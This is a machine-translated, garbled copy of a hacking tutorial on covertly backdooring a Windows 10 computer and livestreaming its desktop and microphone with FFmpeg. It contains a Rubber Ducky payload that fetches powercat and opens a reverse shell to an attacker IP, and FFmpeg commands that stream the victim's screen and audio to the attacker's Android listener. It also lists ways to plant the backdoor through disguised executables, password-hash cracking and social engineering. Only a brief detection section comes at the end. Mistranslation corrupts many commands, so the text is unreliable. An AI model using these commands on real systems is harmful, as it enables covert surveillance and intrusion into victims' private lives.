قالب وردپرس درنا توس
Home / Tips and Tricks / How Backdoor Windows 10 & Livestream Desktop (Without RDP) «Zero Byte :: WonderHowTo

How Backdoor Windows 10 & Livestream Desktop (Without RDP) «Zero Byte :: WonderHowTo



The Windows 10 desktop and microphone can be delivered without using RDP (Remote Desktop Protocol) software and without opening any ports on the target computer. A hacker with low user permissions can monitor and exfoliate a target every move and private conversation in real time no matter where they are. Hackers are watching and listening, and there are few ways to protect yourself.

Understanding FFmpeg Attack

FFmpeg is a multimedia framework that can encode, stream and play most file formats on Windows, MacOS and Unix-based distributions. It is a portable and standalone software, which means that it can run as a single executable without installation or configuration.

The hacker installs FFmpeg software on both the attacker system and the Windows 1

0 computer's goals. They install a listener on the Android attack system that will capture the incoming video stream from the Windows 10 computer. The video stream is stored in a local file and played with the Android device.

Below is an example live stream created with a compromised Windows 10 desktop and listened to with an Android phone. The frame rate is a bit low, which was deliberately done to minimize the CPU load on the target machine and create a smaller video file (AVI) on Android.

Like how macOS can be secretly hacked to stream the entire desktop, Windows 10 is just as vulnerable to such attacks. Even at a low frame rate, an attacker can monitor a target each step in real time.

These attacks can be performed quickly without administrative privileges by just downloading FFmpeg executable and running a single command. All without the goal's knowledge or captured by antivirus software.

Step 1: Back Door Target Windows 10 Computer

This article assumes that a remote back door ( Netcat) has already been set up. Taking control of a Windows 10 device can be done in several ways, including:

Option 1: USB Rubber Ducky

USB Rubber Ducky is a popular wrapping tool. As shown in my second guide on using an Android phone and USB Rubber Ducky for backdoor Windows 10, the Ducky utility length below can create a root shell in seconds through PowerShell.

  DELAY 5500
GUI r
DELAY 700
STRING powershell / w 1 / C $ a = $ env: TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $ a ipmo $ a powercat -c 192.168.0.208 -p 1234 -e powershell
CTRL-SHIFT ENTER
SALE 850
ALT y 

At Amazon: "USB Rubber Ducky: A Guide to Keystroke Injection Attacks" by Darren Kitchen

Option 2: Bypass Login Pass

Similarly, where physical access is possible, a Windows 10 computer can can be backdoored by dropping a malicious file in the directory Startup.

Windows maintains "Startup" folders to launch programs at startup automatically. This was designed for simplicity and allows users to at any time place legitimate program shortcuts (such as web browsers, word processors, media players) and scripts in the StartUp folder. Startup folders are usually abused by attacks to establish some degree of endurance for the device.

In my guide to breaking into a Windows 10 computer without a password, a simple Msfvenom payload is used to control the Windows 10 device remotely. But realistically, a more sophisticated undetectable payload or sophisticated PowerShell payload can be used to maintain endurance.

Option 3: USB Dead Drop

USB death drops are a useful technology to compromise on computers. This topic is in-depth in my guide to hacking WPA2 Wi-Fi passwords with USB kills. The selected payload is intended for ex-filtering Wi-Fi passwords but can be replaced by other PowerShell payloads that can interact with Netcat listeners.

Option 4: E-mail attachment with an undetectable payload

In my guide on an undetectable payload is created, realized in disguise being displayed as common PDF and TXT files. It makes it possible to email malicious attachments. Below is a GIF file of a executable disguised as a text file.

Make no mistake, the file to the right is an executable. When the fake text file is clicked, it opens a new document with notepads, the default text editor in Windows 10. After opening Notepad, a built-in PowerShell payload is executed that creates a backdoor to the Windows 10 computer.

Option 5: Capture and decrypt the login password

If a Wi-Fi network is shared with the Windows 10 computer's goals, it may be possible to capture NTLM hash (shown below, in red).

NTLM data is based on data obtained during the interactive login process and consists of a domain name, a user name and a one-way hash for the user's password. NTLM uses an encrypted protocol to authenticate a user without sending the user's password in plain text over the network.

Unfortunately, the HMAC-MD5 staple algorithm used by NTLM is still highly susceptible to brutal attacks, allowing tens of millions of password attempts per minute – even when the attack is performed using older Android phones and Raspberry Pis.

In my Windows Password interception and decryption guide, the attack is dealt with in greater detail. After the break forced the target's login password, it would be possible to log in and quickly insert a backdoor with schtasks or the StartUp folder.

Option 6: Social Technology (Other Tactics)

There is no telling how many different ways a goal can be tricked into opening a file containing a stager or payload. Inconsistent or otherwise unremarkable things like a birthday card or a post-it note can be used to attract and disarm unsuspecting goals. Common, everyday things can set up complex social engineering hacks in motion, as shown in my hacking Wi-Fi password guide with a birthday card.

Birthday card sent to the target, payload saved on microSD card.

Again, the payload specified in this article can be replaced by another, more complex PowerShell script. It is the social technology and the human hacking aspect that should be considered.

Step 2: Set up UserLAnd App on Android

UserLAnd is an Android app that allows to install Linux distributions along with the Android OS. This is achieved completely without rooting or wiping the Android device. Lightweight Kali or Debian operating systems can be up and running in minutes with a few clicks.

A Kali operating system is required to follow, check out the Distortion guide on turning an Android phone into a rootless chopping unit, as well as my wizard for hacking WPA2 Wi-Fi passwords with Android. They cover both UserLAnd basics and set up Kali Linux, Ngrok and the necessary software you need.

Once you have installed and configured everything, connect to the operating system via SSH with ConnectBot (or JuiceSSH or the built-in SSH client).

Step 3: Install FFmpeg in Kali on Android

First, FFmpeg must be installed on the attacker device to properly intercept the live stream from the chopped Windows 10 computer. Install FFmpeg in Kali (UserLAnd) with the command below.

  sudo apt-get update && sudo apt-get install ffmpeg 

Step 4: Start FFmpeg Listener from Android

To receive incoming feeds, use the command below to start FFmpeg.

  screen ffmpeg -i udp: //0.0.0.0: 10001 /sdcard/Download/livestream.avi[19659046]The screen is prepended to the command, which makes it possible to close the UserLAnd SSH session without terminating the running FFmpeg command. Readers are encouraged to  learn how to use the screen as it makes it easy to switch between the shells. 

This FFmpeg command opens the UDP port ( udp: // ) 10001 and accepts input ( -i ) flows on all available interfaces ( 0.0.0.0 ). It then saves the stream to / sdcard / Download / directory in AVI format with the file name " livestream.avi ." The port number and file name can be changed if needed, but always use / sdcard / Download / directory to make the file available for Android OS and VLC app.

To cancel from the screen session without stopping the FFmpeg listener, press [Ctrl-a then d .

Step 5: Install FFmpeg on the back door of your computer Windows 10

All of the following commands in steps 5, 6 and 7 are made via the backdoor Windows 10 drive. These steps assume that a Netcat shell has been established.

Perform the command below for Invoke-Webrequest ( iwr ) to download FFmpeg ZIP on the Windows 10 computer. In this writing, the latest version is v20190506-fec4212. To make sure you have the latest version, use the Android browser, go to ffmpeg.zeranoe.com/builds/ and copy the latest version URL from there.

  iwr -Uri & # 39; https: //ffmpeg.zeranoe .com / builds / win64 / static / ffmpeg-20190506-fec4212-win64-static.zip & # 39; -Outfile $ env: TEMP ffmpeg. zip 

Invoke-Webrequest will download ( -Uri ) FFmpeg ZIP and save it ( -Outfile ) to the temp directory ( $ env: TEMP ]) with the file name ffmpeg.zip .

Step 6: Unzip the Archive

PowerShell versions> 5.1 have a practical decompression function called Expand-Archive . Expand-Archive can be used to quickly extract ffmpeg.zip in the target's temp directory.

  Expand-Archive -Path $ env: TEMP ffmpeg.zip -DestinationPath $ env: TEMP ffmpeg 

Expand-Archive will include the input file ( $ env: TEMP ]) and unzip it into ( -DestinationPath ) a new folder named ffmpeg . [19659004] When it's ready, change ( cd ) to the new ffmpeg directory. Use the wildcard name (*) shown below to fill in the version number in the directory name.

  cd "$ env: TEMP ffmpeg ffmpeg * in" 

Then list the files in the directory to ensure that ffmpeg.exe is available.

  ls 
  Catalog: C: User IEUser AppData Local Temp ffmpeg ffmpeg-20190116-51978ae-win64-static

Location LastWriteTime Length Name
---- ------------- ------ ----
-a ---- 1/16/2019 4:14 64969728 ffmpeg.exe
-a ---- 1/16/2019 4:14 64856064 ffplay.exe
-a ---- 1/16/2019 4:14 64877568 ffprobe.exe 

As we can see, executable is available. It is now possible to start life stream of the entire desk of the target.

Step 7: Life Stream The Windows 10 Desktop

FFmpeg supports several useful output formats. It can stream the entire desktop with or without sound through the target microphone. Below, it will include streaming video only, audio only, video and audio at the same time.

Option 1: Video streaming only

To start streaming only the entire desktop without sound, use the command below ffmpeg.exe via Netcat back door.

. ffmpeg.exe -f gdigrab -in the desktop -f dshow -f avi udp: //192.168.0.208: 10001 [19659046] Graphics Device Interface  -f gdigrab ) and DirectShow ( -f dshow ) Windows components are responsible for representing graphics and transferring them to connected displays and printers. FFmpeg essentially circles these components ( -in the desktop ) and sends the output ( udp: // ) to the attacker's server in AVI ( -f avi ) format . 

When using the above command, remember to change the attacker's IP address ( 192.168.0.208 ) to the IP used by the Android device hosting the FFmpeg listener. Because the computer is shipped, the video will be available in Apple's download application (or the "Downloads" folder in files, my files, or a similar named app).

For more on GDI and DirectShow and the available command line, check out FFmpeg's documentation on "gdigrab", "desktop" and "dshow".

Option 2: Audio streaming only

It may be more desirable in some scenarios to just stream over the sound of the computers built-in microphone. In this case, first list the available input interfaces built into the Windows 10 computer.

. Ffmpeg.exe -list_devices true -f dshow -i dummy

ffmpeg version N-92981-g51978aefe8 Copyright (c) 2000-2019 FFmpeg Developers
built with gcc 8.2.1 (GCC) 20181201

[dshow @ 0000021d3560a480] DirectShow audio devices
[dshow @ 0000021d3560a480] "Microphone (Realtek High Definition Audio)"
[dshow @ 0000021d3560a480] Alternative name "@device_cm_ {XXXXXXXXXXXXXXXXXXX} wave_ {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}" 

Note the "Microphone (Realtek High Definition Audio)" interface in my FFmpeg output. It may look different from the type of hardware and microphone used by the backdoor Windows 10 computer.

Copy and type the audio interface name exactly as it appears in the following command, with double quotes.

. Ffmpeg .exe -f dshow -i audio = "Microphone (Realtek High Definition Audio)" -f avi udp: //192.168.0.208: 10001 

The argument -i instructs FFmpeg to use ] sound = entered when you stream to the attacker's server.

Option 3: Video and audio streaming simultaneously

To stream the entire desktop while recording audio at the same time, use the command below.

. ffmpeg.exe -f dshow -i audio = "Microphone (Realtek High Definition Audio)": video = "desktop" -f avi udp: //192.168.0.208: 10001 

Similar to audio = argument, here both video = and audio = inputs are used when streaming to the attacker server. The input units are separated by a colon (: ) and must always use double quotes.

Step 8: Watch and listen to the stream in real time

The built-in Android video player cannot play streaming video / audio while the file is actively created (streaming). There are other notable video players that can play video files this way, but only VLC was tested for this article. Feel free to change it with another, equally adequate video player. VLC is available through the F-Droid archive and the Google Play store.

After the installation of VLC, navigate to the Android download app (or the "Downloads" folder in files, my files or a similar named app) to find the "livestream.avi" file. Note how the file size continues to increase as the file flows on the Windows 10 desktop.

To open the file in VLC, select AVI, select either more option icon plus "Open with" or split button, then press "VLC" or "Play with VLC." VLC continues to play the file as long as FFmpeg- the connection is established.

How to Protect Yourself against FFmpeg Attacks

It is unlikely that the antivirus program will defend against these types of attacks on Windows 10. After all, FFmpeg is not considered a malicious application, and it does not try Do not open ports or modify sensitive files on the computer.

Option 1: Search for any malicious programs

If you have never heard of FFmpeg and are sure that it has not been installed by any other application, then FFmpeg probably has no activity on the computer. A simple search helps find related files on your computer.

First, open Explorer and click "My Computer" in the left-hand column. This step is important. Otherwise, it will only search in the current directory. Then search for "ffmpeg" in the upper right corner.

Note FFmpeg EXE and ZIP in the Temp directory. At this point, it is probably best to disconnect the computer from the Internet and router and begin forensic investigations to identify who and when the device was damaged.

Option 2: Use the Task Data Stealing Apps Task Manager [19659012] If your computer is actively delivering data, Windows 10 Task Manager can be used to display running background processes, applications, and services. It can also be used to analyze system resources, such as identifying programs that take up too much RAM or CPU.

To open the Task Manager, look for "Task Manager" and open it as an administrator by right-clicking on it. The task manager must be started with administrator privileges to see something that is run by a root backdoor.

Note "ffmpeg.exe" with 30% of the CPU. A patient attack can optimize the FFmpeg command to minimize the total the load on the CPU, so it can not always be detectable in this way.

To stop FFmpeg right click on the process and select the option "End task". Again, it is probably best to immediately disconnect the computer from the internet and router at this time.

Option 3: Use Wireshark for Spot Data Stealing Apps

Keep in mind that a smart attacker can rename ffmpeg.exe to something less obvious as "explorer.exe" or "service host". For a more comprehensive look at data leaving the Windows 10 computer, download and install the latest version of Wireshark. During the installation, be sure to install WinPcap as it is a necessary dependency on Wireshark.

Open Wireshark and start capturing on all available interfaces. If an attacker actively resets the desktop, a large amount of data will be discarded from the network.

It can be difficult to identify a large amount of data leaving the computer as malicious. Windows 10 does a number of things in the background that can be interpreted as shady . Analyzing the individual packages also does not help either. If this is a FFmpeg attack, it can be identified (with certainty) by the following method.

First right-click a UDP package and select "Follow" and then "UDP Stream".

A new Wireshark window will pop up. Note "client pkts" in the lower left corner. This number continues to increase, as Wireshark compiles the UDP packets into a single stream. Be patient here. If the attacker has lived for a long time, the process can take Wireshark several minutes to complete.

When Wireshark is complete, the View and Save data option will be available. Change it to "Raw" and wait for Wireshark to complete compilation again.

Finally, click "Save As" and save the data with the file name "ive_been_hacked.avi". The video will then be played by the Windows 10 video player. When playing AVI, if it is clearly a video of the entire desktop or audio recordings in your private conversations, the computer has been hacked. Disconnect it from the router immediately.

It's all there to do and detect FFmpeg attacks. Follow me on Twitter @tokyoneon_ and let me know if you have any questions or concerns there or below in the comments here.

Do not miss: Break into Windows 10 Computers without password

Cover photo and screenshots of tokyoneon / Zero byte




Source link